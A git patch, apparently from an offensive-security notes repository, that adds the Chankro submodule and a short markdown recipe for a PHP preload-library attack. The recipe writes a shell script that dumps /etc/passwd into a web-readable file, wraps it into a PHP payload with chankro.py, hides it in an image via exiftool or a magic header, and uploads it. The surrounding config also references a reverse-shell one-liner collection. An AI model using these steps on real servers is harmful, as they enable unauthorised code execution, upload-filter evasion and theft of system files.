From a41a43b6e78d6c738222203fe1503f9860b1a011 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Sat, 11 Sep 2021 16:00:40 +0200
Subject: [PATCH] added php Preload lib exploit

---
 .gitmodules                    |  3 +++
 exploit/web/php/Chankro        |  1 +
 exploit/web/php/preload_lib.md | 15 +++++++++++++++
 3 files changed, 19 insertions(+)
 create mode 160000 exploit/web/php/Chankro
 create mode 100644 exploit/web/php/preload_lib.md

diff --git a/.gitmodules b/.gitmodules
index 46ded40..d2efa93 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -28,3 +28,6 @@
 [submodule "reverse_shells/One-Lin3r"]
 	path = reverse_shells/One-Lin3r
 	url = https://github.com/D4Vinci/One-Lin3r.git
+[submodule "exploit/web/php/Chankro"]
+	path = exploit/web/php/Chankro
+	url = https://github.com/TarlogicSecurity/Chankro.git
diff --git a/exploit/web/php/Chankro b/exploit/web/php/Chankro
new file mode 160000
index 0000000..7b6e844
--- /dev/null
+++ b/exploit/web/php/Chankro
@@ -0,0 +1 @@
+Subproject commit 7b6e844e18f6812beb18db4b67b246edcec04b84
diff --git a/exploit/web/php/preload_lib.md b/exploit/web/php/preload_lib.md
new file mode 100644
index 0000000..32a317e
--- /dev/null
+++ b/exploit/web/php/preload_lib.md
@@ -0,0 +1,15 @@
+# Preload Library
+
+* [Bug report](https://bugs.php.net/bug.php?id=46741)
+* [Chankro repo](https://github.com/TarlogicSecurity/Chankro.git)
+
+## Usage
+* Create lib, find path via `<URL>/phpinfo.php`
+```sh
+echo "#!/usr/bin/env bash" > rev.sh
+echo "cat /etc/passwd > <basepath>/output.txt" >> rev.sh
+
+python2 ./chankro.py --arch 64 --input rev.sh --output chan.php --path <basepath>
+```
+* Put into image file via exiftool or write magic header
+* Upload